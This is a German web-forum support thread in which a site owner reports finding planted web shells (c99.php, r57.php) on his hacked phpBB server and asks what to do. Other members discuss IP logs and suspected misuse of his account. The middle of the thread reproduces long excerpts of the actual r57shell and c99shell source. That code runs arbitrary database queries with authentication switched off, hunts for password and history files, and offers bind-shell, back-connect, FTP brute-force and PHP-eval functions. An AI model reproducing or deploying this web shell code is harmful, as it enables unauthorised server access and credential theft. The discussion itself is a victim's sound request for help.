Es geht noch mal um Hacker!

Support für weitere IT-Themenbereiche
Antworten
Benutzeravatar
Snoopy
Beiträge: 1080
Registriert: So 26.Sep, 2004 20:23
Wohnort: Hannover
Kontaktdaten:

Es geht noch mal um Hacker!

Beitrag von Snoopy »

Ich habe gearde was festgestellt!


Ich hab doch vor kurzen einen neuanfang mit dem phpbb dimension gemacht!

Das alte Forum phpbb2 Plus war noch drauf!


Ich habe vorhin mir die Sachen aus dem media Ordner auf den Rechner gezogen! Da waren Dateien dabei die gar nicht dahingehören!

Und die Zone Alarm Security Suit sagte mir das die eine Datei irgend was mit Shell hat!
Zum einen ist dort eine phpundeine html datei!

Kann ich mir die mal so auf dem Rechner anschauen? Soll ich die vom Server löschen?



Auf dem FTP sind sogar drei c99.php, r57.phpund eineindex.html
Zuletzt geändert von Snoopy am So 08.Okt, 2006 02:07, insgesamt 1-mal geändert.
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Wenn, dann must Du schon die vollständige Fehlermeldung von Zone Alarm posten (ggf.Screenshot), sonst ist das ein Rätzelraten, was die will.
Und was ist den in den rätzenhaften Dateien enthalten?
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
Snoopy
Beiträge: 1080
Registriert: So 26.Sep, 2004 20:23
Wohnort: Hannover
Kontaktdaten:

Beitrag von Snoopy »

Hab 2 Bilder rangehängt!
Einmal, das was bei dem Virusscann rausgekommen ist und dann ein Bild von der html Seite


Auschnitt aus der r57.php (die ersten 250 Zeilen):

Code: Alles auswählen

<?php
/******************************************************************************************************/
/*       ##   ##
/*       ##   ##
/*       #######
/*       ##   ##
/*       ##   ##
/*
/*
/*  r57shell.php - скрипт на пхп позволяющий вам выполнять шелл команды  на сервере через браузер
/*  Версия: 1.23
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/******************************************************************************************************/

/* ~~~ Настройки  ~~~ */
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = "1.23tr  
[KeyCoder]";

if(version_compare(phpversion(), '4.1.0') == -1)
 {
 $_POST   = &$HTTP_POST_VARS;
 $_GET    = &$HTTP_GET_VARS;
 $_SERVER = &$HTTP_SERVER_VARS;
 }
if (@get_magic_quotes_gpc())
 {
 foreach ($_POST as $k=>$v)
  {
  $_POST[$k] = stripslashes($v);
  }
 foreach ($_SERVER as $k=>$v)
  {
  $_SERVER[$k] = stripslashes($v);
  }
 }

/* ~~~ Аутентификация ~~~ */

// $auth = 1; - Аутентификация включена
// $auth = 0; - Аутентификация выключена
$auth = 0;

// Логин и пароль для доступа к скрипту
// НЕ ЗАБУДЬТЕ СМЕНИТЬ ПЕРЕД РАЗМЕЩЕНИЕМ НА СЕРВЕРЕ!!!
$name='Root'; // логин пользователя
$pass='pass'; // пароль пользователя

if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
   {
   header('WWW-Authenticate: Basic realm="shell"');
   header('HTTP/1.0 401 Unauthorized');
   exit(" : Access Denied</b>");
   }
}
$head = '<!-- Здравствуй  Вася -->
<html>
<head>
<title>shell</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

<STYLE>
tr {
BORDER-RIGHT:  #aaaaaa 1px solid;
BORDER-TOP:    #eeeeee 1px solid;
BORDER-LEFT:   #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
td {
BORDER-RIGHT:  #aaaaaa 1px solid;
BORDER-TOP:    #eeeeee 1px solid;
BORDER-LEFT:   #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
.table1 {
BORDER-RIGHT:  #cccccc 0px;
BORDER-TOP:    #cccccc 0px;
BORDER-LEFT:   #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
BACKGROUND-COLOR: #D4D0C8;
}
.td1 {
BORDER-RIGHT:  #cccccc 0px;
BORDER-TOP:    #cccccc 0px;
BORDER-LEFT:   #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
font: 7pt Verdana;
}
.tr1 {
BORDER-RIGHT:  #cccccc 0px;
BORDER-TOP:    #cccccc 0px;
BORDER-LEFT:   #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
}
table {
BORDER-RIGHT:  #eeeeee 1px outset;
BORDER-TOP:    #eeeeee 1px outset;
BORDER-LEFT:   #eeeeee 1px outset;
BORDER-BOTTOM: #eeeeee 1px outset;
BACKGROUND-COLOR: #D4D0C8;
}
input {
BORDER-RIGHT:  #ffffff 1px solid;
BORDER-TOP:    #999999 1px solid;
BORDER-LEFT:   #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #D4D0C8;
font: 8pt Verdana;
}
select {
BORDER-RIGHT:  #ffffff 1px solid;
BORDER-TOP:    #999999 1px solid;
BORDER-LEFT:   #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
submit {
BORDER-RIGHT:  buttonhighlight 2px outset;
BORDER-TOP:    buttonhighlight 2px outset;
BORDER-LEFT:   buttonhighlight 2px outset;
BORDER-BOTTOM: buttonhighlight 2px outset;
BACKGROUND-COLOR: #e4e0d8;
width: 30%;
}
textarea {
BORDER-RIGHT:  #ffffff 1px solid;
BORDER-TOP:    #999999 1px solid;
BORDER-LEFT:   #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
}
BODY {
margin-top: 1px;
margin-right: 1px;
margin-bottom: 1px;
margin-left: 1px;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>';
if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>"; die(); }
if ($_POST['cmd']=="db_query")
 {
  echo $head;
  switch($_POST['db'])
  {
  case 'MySQL':
  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
  if($db)
   {
   	if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
    $querys = @explode(';',$_POST['db_query']);
    foreach($querys as $num=>$query)
     {
      if(strlen($query)>5){
      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
      $res = @mysql_query($query,$db);
      $error = @mysql_error($db);
      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
      else {
      if (@mysql_num_rows($res) > 0)
       {
       $sql2 = $sql = $keys = $values = '';
       while (($row = @mysql_fetch_assoc($res)))
        {
        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
        $values = @array_values($row);
        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
        }
       echo "<table width=100%>";
       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
       $sql .= $sql2;
       echo $sql;
       echo "</table><br>";
       }
      else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
      }
      @mysql_free_result($res);
      }
     }
   	@mysql_close($db);
   }
  else echo "<div align=center><font face=Verdana size=-2 color=red><b>MsSQL Server ile baglanti kurulamadi</b></font></div>";
  break;
  case 'MSSQL':
  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
  if($db)
   {
   	if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
    $querys = @explode(';',$_POST['db_query']);
    foreach($querys as $num=>$query)
     {
      if(strlen($query)>5){
      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
      $res = @mssql_query($query,$db);
      if (@mssql_num_rows($res) > 0)
       {
       $sql2 = $sql = $keys = $values = '';
       while (($row = @mssql_fetch_assoc($res)))
        {
        $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row));
        $values = @array_values($row);
        foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
        $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values);
        $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>";
        }
       echo "<table width=100%>";
       $sql  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
       $sql .= $sql2;
       echo $sql;
       echo "</table><br>";
       }
      /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
      @mssql_free_result($res);
      }
     }
   	@mssql_close($db);
   }
  else echo "<div align=center><font face=Verdana size=-2 color=red><b>MSSQL server ile baglanti Kurulamadi</b></font></div>";
  break;
  case 'PostgreSQL':
  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
  $db = @pg_connect($str);
  if($db)
   {
    $querys = @explode(';',$_POST['db_query']);
    foreach($querys as $num=>$query)
     {
      if(strlen($query)>5){
      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
      $res = @pg_query($db,$query);
      $error = @pg_errormessage($db);
      if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
      else {
      if (@pg_num_rows($res) > 0)

Auschnitt aus der c99.php (die ersten 240 Zeilen):

Code: Alles auswählen

<?php
/*
******************************************************************************************************
*
*					c99shell.php v.1.0 beta (îò 21.05.2005)
*							Freeware license.
*								© CCTeaM.
*  c99shell - ôàéë-ìåíåäæåð ÷åðåç www-áðîóçåð, "çàòî÷åíûé" äëÿ âçëîìà.
*  Âû ìîæåòå áåñïëàòíî ñêà÷àòü ïîñëåäíþþ âåðñèþ íà äîìàøíåé ñòðàíè÷êå ïðîäóêòà:
   http://ccteam.ru/releases/c99shell
*
*  WEB: http://ccteam.ru
*  ICQ UIN #: 656555
* 
*  Îñîáåííîñòè:
*  + óïðàâëåíèå ëîêàëüíûìè è óäàëåííûìè (ftp, samba *) ôàéëàìè/ïàïêàìè, ñîðòèðîâêà
*    çàêà÷èâàíèå ñêà÷èâàíèå ôàéëîâ è ïàïîê
*    (ïðåäâîðèòåëüíî óïàêîâûâàåòñÿ/ðàñïàêîâûâàåòñÿ ÷åðåç tar *)
*    ïðîäâèíóòûé ïîèñê (âîçìîæåí âíóòðè ôàéëîâ)
*    modify-time è access-time ó ôàéëîâ íå ìåíÿþòñÿ ïðè ðåäàêòèðîâàíèè (âûêë./âêë. ïàðàìåòðîì $filestealth)
*  + ïðîäâèíóòûé SQL-ìåíåäæåð íå óñòóïàþùèé phpmyadmin,
     ïðîñìîòð/ñîçäàíèå/ðåäàêòèðîâàíèå ÁÄ/òàáëèö, ïðîñìîòð ôàéëîâ ÷åðåç áðåøü â mysql
*  + óïðàâëåíèå ïðîöåññàìè unix-ìàøèíû.
*  + óäîáíîå (èíîãäà ãðàôè÷åñêîå) âûïîëíåíèå shell-êîìàíä (ìíîãî àëèàñîâ, ìîæíî ðåäàêòèðîâàòü)
*  + âûïîëíåíèå ïðîèçâîëüíîãî PHP-êîäà
*  + êîäèðîâùèê äàííûõ ÷åðåç md5, unix-md5, sha1, crc32, base64
*  + áûñòðûé ëîêàëüíûé àíàëèç áåçîïàñíîñòè ÎÑ
*  + áûñòðîå ftp-ñêàíèðîâàíèå íà ñâÿçêè login;login èç /etc/passwd (îáû÷íî äàåò äîñòóï ê 1/100 àêêàóíòîâ)
*    ïîñòðàíè÷íûé âûâîä, ñîðòèðîâêà, ãðóïïîâûå îïåðàöèè íàä ÁÄ/òàáëèöàìè, óïðàâëåíèå ïðîöåññàìè SQL)
*  + ñêðèïò "ëþáèò" include: àâòîìàòè÷åñêè èùåò ïåðåìåííûå ñ äåñêðèïòîðàìè è âñòàâëÿåò èõ â ññûëêè (îïöèàëüíî)
     òàêæå ìîæíî èçìåíèòü $surl (áàçîâàÿ ññûëêà) êàê ÷åðåç êîíôèãóðàöèþ (ïðèíóäèòåëüíî) òàê è ÷åðåç cookie "c99sh_surl",
     èäåò àâòî-çàïèñü çíà÷åíèÿ $set_surl â cookie "set_surl"
*  + âîçìîæíîñòü "çàáèíäèòü" /bin/bash íà îïðåäåëåííûé ïîðò ñ ïðîèçâîëüíûì ïàðîëåì,
*    èëè ñäåëàòü back connect (ïðîèçâîäèòñÿ òåñòèðîâàíèå ñîåäåíåíèÿ, è âûâîäÿòñÿ ïàðàìåòðû äëÿ çàïóñêà NetCat).
*  + âîçìîæíîñòü áûñòðîãî ñàìî-óäàëåíèÿ ñêðèïòà
*  + àâòîìàòèçèðîâàíàÿ îòïðàâêà ñîîáùåíèé î íåäîðàáîòêàõ è ïîæåëàíèé àâòîðó (÷åðåç mail())

*  * - óñïåõ ïîëíîñòüþ çàâèñèò îò êîíôèãóðàöèè PHP
*
*	 îáùåì íóæíî óâèäåòü âñ¸ ýòî!
*
*   Îæèäàåìûå èçìåíåíèÿ:
*  ~ Ðàçâèòèå sql-ìåíåäæåðà
*  ~ Äîáàâëåíèå íåäîñòàþùèõ ðàñøèðåíèé ôàéëîâ
*
*  ~-~ Ïèøèòå îáî âñåõ íàéäåíûõ íåäîðàáîòêàõ, æåëàåìûõ èçìåíåíèÿõ è äîðàáîòêàõ (äàæå î ñàìûõ íåçíà÷èòåëüíûõ!)
       â ICQ UIN #656555 ëèáî ÷åðåç ðàçäåë "feedback", áóäóò ðàññìîòðåíû âñå ïðåäëîæåíèÿ è ïîæåëàíèÿ.
*
*  Last modify: 21.05.2005
*
*  © Captain Crunch Security TeaM. Coded by tristram
*
******************************************************************************************************
*/

//Starting calls
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
@ignore_user_abort(true);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
$win = strtolower(substr(PHP_OS, 0, 3)) == "win";
if (!@ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}

$shver = "1.0 beta (21.05.2005)"; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
}

$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.

if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
if (empty($surl))
{
 $surl = "?".$includestr; //Self url
}
$surl = htmlspecialchars($surl);

$timelimit = 60; //limit of execution this script (seconds), 0 = unlimited.

//Authentication

$login = "c99"; //login
//DON'T FORGOT ABOUT CHANGE PASSWORD!!!
$pass = "c99"; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)

	/*COMMENT IT FOR TURN ON AUTHENTIFICATION >>>*/	$login = false; //turn off authentification

$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";

$autoupdate = false; //Automatic updating?
$updatenow = false; //If true, update now
$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/"; //Update server

$filestealth = false; //if true, don't change modify&access-time

$donated_html = "<center><b>Owned by hacker</b></center>";
		/* If you publish free shell and you wish
		add link to your site or any other information,
		put here your html. */
$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.

$curdir = "./"; //start directory
//$curdir = getenv("DOCUMENT_ROOT");
$tmpdir = ""; //Directory for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)

$log_email = "user@host.tld"; //Default e-mail for sending logs

$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
$sort_save = true; //If true then save sorting-type.

// Registered file-types.
//  array(
//   "{action1}"=>array("ext1","ext2","ext3",...),
//   "{action2}"=>array("ext4","ext5","ext6",...),
//   ...
//  )
$ftypes  = array(
 "html"=>array("html","htm","shtml"),
 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
 "exe"=>array("sh","install","bat","cmd"),
 "ini"=>array("ini","inf"),
 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
 "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
 "sdb"=>array("sdb"),
 "phpsess"=>array("sess"),
 "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);

// Registered executable file-types.
//  array(
//   string "command{i}"=>array("ext1","ext2","ext3",...),
//   ...
//  )
//   {command}: %f% = filename
$exeftypes  = array(
 getenv("PHPRC")." %f%"=>array("php","php3","php4"),
);

/* Highlighted files.
  array(
   i=>array({regexp},{type},{opentag},{closetag},{break})
   ...
  )
  string {regexp} - regular exp.
  int {type}:
	0 - files and folders (as default),
	1 - files only, 2 - folders only
  string {opentag} - open html-tag, e.g. "<b>" (default)
  string {closetag} - close html-tag, e.g. "</b>" (default)
  bool {break} - if true and found match then break
*/
$regxp_highlight  = array(
  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
  array("config.php",1) // example
);

$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
									 // array (i=>{letter} ...); string {letter} - letter of a drive
									// Set as false or for turn off.
$hexdump_lines = 8;	// lines in hex preview file
$hexdump_rows = 24;	// 16, 24 or 32 bytes in one line

$nixpwdperpage = 100; // Get first N lines from /etc/passwd

$bindport_pass = "c99";	  // default password for binding
$bindport_port = "11457"; // default port for binding

// Command-aliases
if (!$win)
{
 $cmdaliases = array(
  array("-----------------------------------------------------------", "ls -la"),
  array("find all suid files", "find / -type f -perm -04000 -ls"),
  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
  array("find all sgid files", "find / -type f -perm -02000 -ls"),
  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  array("find config.inc.php files", "find / -type f -name config.inc.php"),
  array("find config* files", "find / -type f -name \"config*\""),
  array("find config* files in current dir", "find . -type f -name \"config*\""),
  array("find all writable directories and files", "find / -perm -2 -ls"),
  array("find all writable directories and files in current dir", "find . -perm -2 -ls"),
  array("find all service.pwd files", "find / -type f -name service.pwd"),
  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
  array("find all .htpasswd files", "find / -type f -name .htpasswd"),
  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  array("find all .bash_history files", "find / -type f -name .bash_history"),
  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  array("list file attributes on a Linux second extended file system", "lsattr -va"),
  array("show opened ports", "netstat -an | grep -i listen")
 );
}
else
{
 $cmdaliases = array(
  array("-----------------------------------------------------------", "dir"),
  array("show opened ports", "netstat -an")
 );
}

$sess_cookie = "c99shvars"; // Cookie-variable name

$usefsbuff = true; //Buffer-function
$copy_unset = false; //Remove copied files from buffer after pasting

//Quick launch
$quicklaunch = array(
 array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
 array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
 array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
 array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
 array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
 array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
 array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
 array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
 array("<b>Bind</b>",$surl."act=bind&d=%d"),
 array("<b>Proc.</b>",$surl."act=ps_aux&d=%d"),
 array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
 array("<b>Sec.</b>",$surl."act=security&d=%d"),
 array("<b>SQL</b>",$surl."act=sql&d=%d"),
 array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
 array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
 array("<b>Self remove</b>",$surl."act=selfremove"),
 array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
);

//Highlight-code colors
$highlight_background = "#c0c0c0";
Dateianhänge
html_seite.jpg
Virusscann.jpg
Benutzeravatar
Dungeonwatcher
Beiträge: 1055
Registriert: Sa 19.Feb, 2005 01:16
Wohnort: Berlin
Kontaktdaten:

Re: Es geht noch mal um Hacker!

Beitrag von Dungeonwatcher »

Moin, moin! :cool:

[quote="Snoopy";p="64798"]Auf dem FTP sind sogar drei c99.php, r57.php und eineindex.html[/quote]

Lies hier mal
--> http://www.joomlaportal.de/sicherheit/5 ... tacke.html
--> http://www.phpbb2.de/fpost206689.html
--> http://forum.joomla.org/index.php/topic,78268.0.html
--> PHP.Backdoor.Trojan

Bye/2
Benutzeravatar
Snoopy
Beiträge: 1080
Registriert: So 26.Sep, 2004 20:23
Wohnort: Hannover
Kontaktdaten:

Beitrag von Snoopy »

Hab die Dateien gelöscht!

Mit den englsichen Seiten kann ich leider nichts anfangen, aber trotzdem danke!



EDIT:

Die Loginsicherheit des CTs hat mir etwas angezeigt:

7 Sat 07 Oct, 2006 23:55 81.14.200.67 (meine eigentliche IP)
8 Sat 07 Oct, 2006 23:50 85.97.153.156
9 Sat 07 Oct, 2006 23:50 85.97.153.156


Die anderen, hab ich rausgefunden, das sie aus Kayseri stammen. Ich glaube das liegt in der Türkei, denn in der nähe liegt Istanbul!

Ich hab das Passwort für mein Forum auch geändert. Hat das was zu bedeuten, oder nicht?
Zuletzt geändert von Snoopy am So 08.Okt, 2006 15:01, insgesamt 1-mal geändert.
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Öhm, die IP's werden dynamisch vergeben.
Es ist also die Frage, wann Du welche IP hattest ;)
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
Snoopy
Beiträge: 1080
Registriert: So 26.Sep, 2004 20:23
Wohnort: Hannover
Kontaktdaten:

Beitrag von Snoopy »

Das ist alles ne Spur zu hoch für mich!

Immer wennich ins ACP schaue hab ich eine IP von 81.14.**** ab und an hatte ich mal eine die 89.*** anfing!

Aber warum gibt Neotrance mir den eine Stadt aus der Türkei an?
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

IP's werden immer dynamisch vergeben.
Jedes Mal, wenn Du Dich am Internet anmeldest, vergibt der ISP (also Dein Internet Provider) eine gerade freie IP in seinem verfügbaren Bereich.
In der Regel erhälst Du, sofern Du regelmässig im Internet unterwegs bist, die gleiche IP, es kann aber auch jederzeit vorkommen, daß sich Deine IP ändert.
Dann wird die vorherige IP irgend einem anderen Kunden zugeteilt.
Und wenn der eben in der Türkei sitzt, dann ist das nunmal so.

Allerdings, und das liegt hier näher:
Dein Board wurde von türkischen Hackern auseinander genommen.
Ich vermute hier dann eher, daß diese(r) Hacker Deinen Account verwendete, um das Board zu hacken und zu verändern, er meldete sich also mit Deinen Daten am Board an, daher dann auch die IP's auf der Türkei im CT-Log.
Da diese IP's nun in der Türkei liegen, würdest Du wohl kaum eine Chance haben, diese für eine Anzeige verwenden zu können. Leider.
Daher würde ich die IP's mal auf jeden Fall im CT sperren, damit dieser erst garnicht mehr dem Board nahe kommen kann, ohne, daß der CT den Zugang sofort sperrt und eine Meldung auswirft.
Allerdings dann auch nur auf dem Board, den Server kann der CT so nicht sichern.
Nun, Cback hat einen Standalone-CT entwickelt, aber dafür würdest Du Root-Rechte auf dem Server benötigen, welche Du ja nicht hast...
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
Snoopy
Beiträge: 1080
Registriert: So 26.Sep, 2004 20:23
Wohnort: Hannover
Kontaktdaten:

Beitrag von Snoopy »

http://www.zone-h.org/index2.php?option ... id=4891368

Hab ich gerade gefunden! Hab bei Google ma Snoopytraum eingegeben und bin auf diese Seite gestoßen http://www.zone-h.org

Nach einigen stöbern hab ich den ersten Link gefunden!

Was hat diese Seite zu bedeuten?


Wenn mann mal schaut was heute schon so alles gehackt worden ist, wahnsinn!
Benutzeravatar
Dungeonwatcher
Beiträge: 1055
Registriert: Sa 19.Feb, 2005 01:16
Wohnort: Berlin
Kontaktdaten:

Beitrag von Dungeonwatcher »

'n Abend! :cool:

[quote="Snoopy";p="65030"]Wenn mann mal schaut was heute schon so alles gehackt worden ist, wahnsinn![/quote]
Tja, zumindest ist mein benutztes BS nicht darunter. Ich bleibe also bei Diesem und dem unbekannten Webserver. ;)

Bye/2
Zuletzt geändert von Dungeonwatcher am Do 12.Okt, 2006 23:20, insgesamt 2-mal geändert.
Benutzeravatar
Snoopy
Beiträge: 1080
Registriert: So 26.Sep, 2004 20:23
Wohnort: Hannover
Kontaktdaten:

Beitrag von Snoopy »

BS? Was ist das?


Nach den Angaben von dem ersten Link, ist der dann über den Anbieter rein?
Zuletzt geändert von Snoopy am Do 12.Okt, 2006 23:25, insgesamt 1-mal geändert.
Benutzeravatar
Dungeonwatcher
Beiträge: 1055
Registriert: Sa 19.Feb, 2005 01:16
Wohnort: Berlin
Kontaktdaten:

Beitrag von Dungeonwatcher »

Moin! :cool:

[quote="Snoopy";p="65037"]BS? Was ist das?[/quote]

Betriebssystem
Nach den Angaben von dem ersten Link, ist der dann über den Anbieter rein?
Hmmm, nun kann ich dir nicht folgen... ^6

Bye/2
Benutzeravatar
Snoopy
Beiträge: 1080
Registriert: So 26.Sep, 2004 20:23
Wohnort: Hannover
Kontaktdaten:

Beitrag von Snoopy »

Ich stelle mir immer noch dir Frage, wie der ins KAS gekommen ist, wo ich meine Datenbanken anlegen kann.

Lag es an mir oder am Anbieter? Kann man das nicht irgendwie feststellen?
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

